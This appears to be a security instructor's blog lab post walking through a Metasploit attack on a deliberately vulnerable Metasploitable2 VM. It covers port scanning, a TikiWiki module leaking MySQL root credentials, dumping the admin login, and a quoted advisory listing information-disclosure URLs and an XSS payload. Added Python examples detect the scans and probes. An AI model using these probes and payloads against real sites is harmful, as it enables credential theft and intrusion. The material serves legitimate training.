Information Security (old version)/Metasploit 2016. 6. 2. 17:08

Metasploit - 06. Vulnerability discovery and exploitation (exploiting a tikiwiki vulnerability)

This material is organized for hands-on practice as part of a training course. Be advised that if it is used for personal or malicious purposes, legal responsibility rests with the person doing so.

[Lab systems] Kali Linux, Firewall, Metasploitable2-Linux

 - Use Metasploit to discover vulnerabilities, then exploit the tikiwiki vulnerability.

 - tikiwiki : a wiki service that uses a MySQL DB (more widely used than other wikis)

 - Reference sites : http://tiki.org, http://tehemes.tiki.org

[Note] Wiki

A bulletin-board-style web service for the internet or for internal company use, in which posts and documents are worked on collaboratively.

[Lab steps]

Create 'tikiwiki195' DB -> scan -> exploit tikiwiki vulnerability -> obtain MySQL ID/PASSWORD -> connect to tikiwiki MySQL ->
-> access tikiwiki195 DB and check ID/PASSWORD -> connect via web and log in as administrator

Ex1) Create the 'tikiwiki195' DB in Metasploitable2-Linux MySQL

@ Kali Linux

 - To test the vulnerability, create a 'tikiwiki195' DB in the Metasploitable2-Linux MySQL server.

root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php

Click 'go here to begin the installation process'

Create the 'tikiwiki195' DB with the root account -> click Submit Query

~ omitted ~

Click create -> close Firefox

 - Verify on Metasploitable2-Linux that the 'tikiwiki195' DB was created

@ Metasploitable2-Linux

msfadmin@metasploitable:~$ mysql -u root -p
Enter password: (Enter)
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 14
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)

mysql> quit
Bye
msfadmin@metasploitable:~$

Ex2) Using 'powerfuzzer' to check tikiwiki URLs (may be skipped during the lab)

 - powerfuzzer : a scanning tool that searches a web site or application for hidden files, directories, and URLs

@ Kali Linux

root@kali:~# powerfuzzer &
[1] 27746

Scan the URL '192.168.20.204' and check the results

Confirm access to 'http://192.168.20.204/twiki/bin/view/Main/WebHome'

Ex3) Searching for and exploiting the 'tikiwiki' vulnerability

 - Run a db_nmap scan against '192.168.20.204'.

@ Kali Linux

  -sV: Probe open ports to determine service/version info

root@kali:~# msfconsole

msf > db_nmap -sV 192.168.20.204
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-02 16:29 KST
[*] Nmap: Nmap scan report for 192.168.20.204
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
~ omitted ~
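
The db_nmap output above is also what a defender works from when checking a host's exposure against what it is supposed to serve. The following Python is an added example (not part of the original lab or of Metasploit): it parses the "[*] Nmap:" service lines printed inside msfconsole into a service inventory and reports every open port that is not on an approved baseline. The sample lines are copied from the scan output above; the baseline of ports 22 and 80 is an assumption made for the example.

```python
import re

# One "[*] Nmap:" service line as printed by db_nmap -sV inside msfconsole:
# "<port>/<proto>  <state>  <service>  <version text>"
NMAP_LINE = re.compile(
    r"^\[\*\] Nmap: (?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+"
    r"(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_db_nmap(lines):
    """Turn db_nmap -sV console lines into a list of service records.

    Header, summary and '~ omitted ~' lines do not match the pattern and are skipped.
    """
    records = []
    for line in lines:
        m = NMAP_LINE.match(line.rstrip())
        if not m:
            continue
        records.append({
            "port": int(m["port"]),
            "proto": m["proto"],
            "state": m["state"],
            "service": m["service"],
            "version": m["version"].strip(),
        })
    return records


def unexpected_services(records, allowed_ports):
    """Return the open services whose port is not in the approved baseline."""
    return [r for r in records
            if r["state"] == "open" and r["port"] not in allowed_ports]


# Sample input: the db_nmap lines shown earlier on this page.
SAMPLE_SCAN = """\
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
~ omitted ~
""".splitlines()

# Assumed baseline for the lab host: only SSH and HTTP are expected to be reachable.
ALLOWED_PORTS = {22, 80}

if __name__ == "__main__":
    services = parse_db_nmap(SAMPLE_SCAN)
    for svc in unexpected_services(services, ALLOWED_PORTS):
        print(f"{svc['port']}/{svc['proto']} {svc['service']:12} {svc['version']}")
```

The version column is kept verbatim so the inventory can later be matched against advisories; on this host the telnet, rexec and rpcbind services are exactly the kind of entries a baseline review would question.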


msf > search tikiwiki

Matching Modules
================

   Name                                             Disclosure Date  Rank       Description
   ----                                             ---------------  ----       -----------
   auxiliary/admin/tikiwiki/tikidblib               2006-11-01       normal     TikiWiki Information Disclosure
   exploit/unix/webapp/php_xmlrpc_eval              2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution
   exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  TikiWiki tiki-graph_formula Remote PHP Code Execution
   exploit/unix/webapp/tikiwiki_jhot_exec           2006-09-02       excellent  TikiWiki jhot Remote Command Execution
   exploit/unix/webapp/tikiwiki_unserialize_exec    2012-07-04       excellent  Tiki Wiki unserialize() PHP Code Execution

msf > use auxiliary/admin/tikiwiki/tikidblib
msf auxiliary(tikidblib) >
msf auxiliary(tikidblib) > show options

Module options (auxiliary/admin/tikiwiki/tikidblib):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /tikiwiki        yes       TikiWiki directory path
   VHOST                     no        HTTP server virtual host


Auxiliary action:

   Name      Description
   ----      -----------
   Download

msf auxiliary(tikidblib) > set RHOST 192.168.20.204
RHOST => 192.168.20.204

msf auxiliary(tikidblib) > run

[*] Establishing a connection to the target...
[*] Get informations about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type      : mysql
[*] DB name      : tikiwiki195
[*] DB host      : localhost
[*] DB user      : root
[*] DB password  :
[*] Auxiliary module execution completed
msf auxiliary(tikidblib) >
msf auxiliary(tikidblib) > quit
root@kali:~#

 - Connect to Metasploitable2-Linux and check the MySQL information

@ Kali Linux

root@kali:~# telnet 192.168.20.204

~ omitted ~

Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password: msfadmin

msfadmin@metasploitable:~$ mysql -u root -p
Enter password: (Enter)
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 193
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)

mysql> use tikiwiki195
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed


mysql> show tables;
~ omitted ~

| users_objectpermissions            |
| users_permissions                  |
| users_usergroups                   |
| users_users                        |
+------------------------------------+
194 rows in set (0.00 sec)

mysql> select * from users_users;
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| userId | email | login | password | provpass | default_group | lastLogin  | currentLogin | registrationDate | challenge | pass_due | hash                             | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
|      1 |       | admin | admin    | NULL     | NULL          | 1271712540 |   1271712540 |             NULL | NULL      |     NULL | f6fdffe48c908deb0f4c3bd36c032e72 |    NULL | NULL       |       NULL | NULL           | NULL       | NULL          | NULL       |     0 |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
1 row in set (0.01 sec)

mysql> select login,password from users_users;
+-------+----------+
| login | password |
+-------+----------+
| admin | admin    |
+-------+----------+
1 row in set (0.00 sec)

mysql> quit
Bye
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ exit
Connection closed by foreign host.

 - Connect via the web and test logging in with 'admin/admin'

@ Kali Linux

root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php

Log in with 'admin/admin'

[Note] See the exploit-db site

 - exploit-db site -> search -> search for tikiwiki

 - https://www.exploit-db.com/exploits/2701/

2006-11-01 TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability

/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius-  (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/

there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
an anonymous user can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var, with the following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=

a proof of concept is available here : http://cockor.free.fr/PoC.swf

there's also an xss here :
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--

regards , securfrog

# milw0rm.com [2006-11-01]

@ Kali Linux

 - Launch Firefox and open the following URL.

root@kali:~# firefox &

http://192.168.20.204/tikiwiki/tiki-listpages.php?offset=0&sort_mode=

Once the page loads, scroll down and check the 'root' password
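
The request shapes quoted from the advisory are also what a defender can look for in web-server logs. The following Python is an added example (not part of the original post or of the TikiWiki project): it parses Apache access-log lines and flags requests to the listed scripts whose trigger parameter (sort_mode, or forumId for tiki-view_forum.php) is present but empty, which is the error-provoking form described above. The log lines are constructed for this example, and the pattern assumes the Apache common/combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts listed in the advisory above, each with the parameter that, when left empty,
# provokes the MySQL error that leaks connection details.
PROBE_PARAMS = {script: "sort_mode" for script in (
    "tiki-listpages.php", "tiki-lastchanges.php", "messu-archive.php",
    "messu-mailbox.php", "messu-sent.php", "tiki-directory_add_site.php",
    "tiki-directory_ranking.php", "tiki-directory_search.php", "tiki-forums.php",
    "tiki-friends.php", "tiki-list_blogs.php", "tiki-list_faqs.php",
    "tiki-list_trackers.php", "tiki-list_users.php", "tiki-my_tiki.php",
    "tiki-notepad_list.php", "tiki-orphan_pages.php", "tiki-shoutbox.php",
    "tiki-usermenu.php", "tiki-webmail_contacts.php",
)}
PROBE_PARAMS["tiki-view_forum.php"] = "forumId"

# Apache common/combined log prefix: client, identd, user, [timestamp], "METHOD target PROTO", status
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_empty_param_probe(target):
    """True if the request targets a listed script with its trigger parameter present but empty."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    param = PROBE_PARAMS.get(script)
    if param is None:
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    return param in qs and all(v == "" for v in qs[param])


def scan_access_log(lines):
    """Return one finding per matching request: client, timestamp, target and status."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and is_empty_param_probe(m["target"]):
            findings.append({
                "client": m["client"], "ts": m["ts"],
                "target": m["target"], "status": int(m["status"]),
            })
    return findings


# Constructed sample: a normal page view, two probes, one legitimate sort, one TWiki hit.
SAMPLE_LOG = """\
192.168.20.10 - - [02/Jun/2016:16:40:01 +0900] "GET /tikiwiki/tiki-index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.20.10 - - [02/Jun/2016:16:41:17 +0900] "GET /tikiwiki/tiki-listpages.php?offset=0&sort_mode= HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
192.168.20.10 - - [02/Jun/2016:16:41:20 +0900] "GET /tikiwiki/tiki-listpages.php?offset=0&sort_mode=pageName_asc HTTP/1.1" 200 7002 "-" "Mozilla/5.0"
192.168.20.10 - - [02/Jun/2016:16:42:05 +0900] "GET /tikiwiki/tiki-view_forum.php?forumId= HTTP/1.1" 200 3011 "-" "Mozilla/5.0"
192.168.20.10 - - [02/Jun/2016:16:42:30 +0900] "GET /twiki/bin/view/Main/WebHome HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} -> {f['target']} ({f['status']})")
```

An empty sort_mode can also appear in ordinary use, so treat a hit as a lead to correlate with the PHP and MySQL error logs rather than as proof of a probe. On the server side the exposure shown on this page has two parts worth fixing independently: the application reporting database errors, connection string included, to anonymous clients, and the application connecting as MySQL root with an empty password, which is exactly what the tikidblib output above reveals.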

[Note] HTTrack

 - A tool similar to powerfuzzer, but HTTrack builds a clone of the web site.

Ex1) Install HTTrack

root@kali:~# apt-get install httrack

Ex2) Create and check the web-site clone directory

(Terminal 1)

root@kali:~# mkdir /test-web-site
root@kali:~# cd /test-web-site/
root@kali:/test-web-site#

Ex3) Clone the web site using HTTrack

(Terminal 1)

root@kali:/test-web-site# httrack

Welcome to HTTrack Website Copier (Offline Browser) 3.48-20
Copyright (C) 1998-2014 Xavier Roche and other contributors
To see the option list, enter a blank line or try httrack --help

Enter project name :HTTrack Test

Base path (return=/root/websites/) :/test-web-site

Enter URLs (separated by commas or blank spaces) :192.168.20.204

Action:
(enter)  1 Mirror Web Site(s)
          2 Mirror Web Site(s) with Wizard
          3 Just Get Files Indicated
          4 Mirror ALL links in URLs (Multiple Mirror)
          5 Test Links In URLs (Bookmark Test)
          0 Quit
: 2

Proxy (return=none) : (Enter)

You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip
Wildcards (return=none) : (Enter)

You can define additional options, such as recurse level (-r<number>), separed by blank spaces
To see the option list, type help
Additional options (return=none) : (Enter)

---> Wizard command line: httrack 192.168.20.204 -W -O "/test-web-site/HTTrack Test"  -%v

Ready to launch the mirror? (Y/n) :y

WARNING! You are running this program as root!
It might be a good idea to run as a different user
Mirror launched on Fri, 03 Jun 2016 14:02:41 by HTTrack Website Copier/3.48-20 [XR&CO'2014]
mirroring 192.168.20.204 with the wizard help..

Ex4) Check the contents of the web-site clone

(Terminal 2)

root@kali:~# cd /test-web-site/
root@kali:/test-web-site# ls
HTTrack Test

root@kali:/test-web-site# cd HTTrack\ Test/
root@kali:/test-web-site/HTTrack Test# ls
192.168.20.204  fade.gif   hts-in_progress.lock  index.html
backblue.gif    hts-cache  hts-log.txt

root@kali:/test-web-site/HTTrack Test# cd 192.168.20.204
root@kali:/test-web-site/HTTrack Test/192.168.20.204# ls
dav  dvwa  index.html  mutillidae  phpMyAdmin  twiki

root@kali:/test-web-site/HTTrack Test/192.168.20.204# cd twiki/
root@kali:/test-web-site/HTTrack Test/192.168.20.204/twiki# ls
TWikiDocumentation.html.tmp  bin         license.txt  readme.txt.tmp
TWikiHistory.html.tmp        index.html  readme.txt

root@kali:/test-web-site/HTTrack Test/192.168.20.204/twiki# find .
.
./TWikiHistory.html.tmp
./readme.txt
./readme.txt.tmp
./license.txt
./bin
./bin/view
./bin/view/Main
./bin/view/Main/WebHome.html.tmp
./TWikiDocumentation.html.tmp
./index.html

root@kali:/test-web-site/HTTrack Test/192.168.20.204/twiki#

Ex5) Terminate HTTrack

(Terminal 1)

Mirror launched on Fri, 03 Jun 2016 14:02:41 by HTTrack Website Copier/3.48-20 [XR&CO'2014]
mirroring 192.168.20.204 with the wizard help..

(ctrl+c)

Program terminated (signal 2)
root@kali:/test-web-site# cd

root@kali:~#

Posted by 김정우 (instructor; KakaoTalk : kim10322)